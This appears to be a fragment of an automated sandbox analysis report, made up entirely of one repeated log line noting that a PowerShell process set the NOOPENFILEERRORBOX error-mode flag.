            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
